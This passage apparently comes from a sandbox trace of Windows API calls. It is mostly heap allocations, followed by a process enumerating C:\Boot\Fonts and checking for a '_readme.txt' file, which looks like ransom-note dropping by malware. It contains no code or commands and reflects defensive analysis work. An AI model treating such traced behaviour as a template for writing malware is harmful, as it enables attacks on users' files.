Flags=0x0, Size=0x20) returned 0x3240a28 [0146.519] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.519] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.519] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.519] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.519] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.519] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.519] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.519] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.519] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.519] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.519] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.519] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.519] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.520] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.520] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.520] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.520] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.520] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.520] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.520] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.520] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.520] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.520] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.520] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.520] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.520] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.520] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.520] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.520] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.520] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.520] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.520] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.520] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.520] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.520] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.520] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.520] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.520] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.520] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.520] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.520] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.520] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.520] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.520] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.520] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.520] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.520] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.520] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.520] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.520] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.521] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.521] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.521] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.521] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.521] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.521] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.521] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.521] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.521] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.521] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.521] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.521] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.521] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.521] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.521] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.521] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.521] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.521] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.521] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.521] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.521] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.521] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.521] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.521] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.521] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.521] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.521] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.521] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.521] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.521] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.521] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.521] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.521] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.521] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.521] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.521] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.521] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.521] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.521] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.522] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.522] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.522] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.522] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.522] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.522] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.522] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.522] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.522] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.522] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.522] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.522] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.522] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.522] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.522] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.522] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.522] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.522] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.522] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.522] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.522] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.522] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.522] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.522] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.522] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.522] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.522] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.522] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.522] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.522] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.522] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.522] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.522] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.522] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.522] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.522] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.522] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.522] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.522] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.523] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.523] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.523] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.523] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.523] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.523] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.523] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.523] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.523] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0146.523] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.523] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.523] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.523] PathFindFileNameW (pszPath="") returned="" [0146.523] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.523] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.523] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.523] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.523] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.523] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.523] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.524] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0146.524] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.524] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.524] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0146.527] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.527] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.527] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb1f9f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb1f9f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.527] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.527] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb1f9f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb1f9f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.527] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0146.527] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0146.527] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0146.527] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0146.527] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0146.527] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb1f9f0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb1f9f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb1f9f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.527] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb1f9f0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb1f9f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb1f9f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.527] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.527] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.527] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.527] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.527] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.527] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.527] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.527] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.527] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.527] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.528] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.528] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.528] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.528] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.528] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.528] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.528] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.528] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.528] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.528] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.528] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.528] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.528] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.528] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.528] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.528] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.528] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.528] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.528] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.528] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.528] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.528] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.528] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.528] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.528] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.528] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.528] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.528] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.528] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.528] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.528] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.528] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: 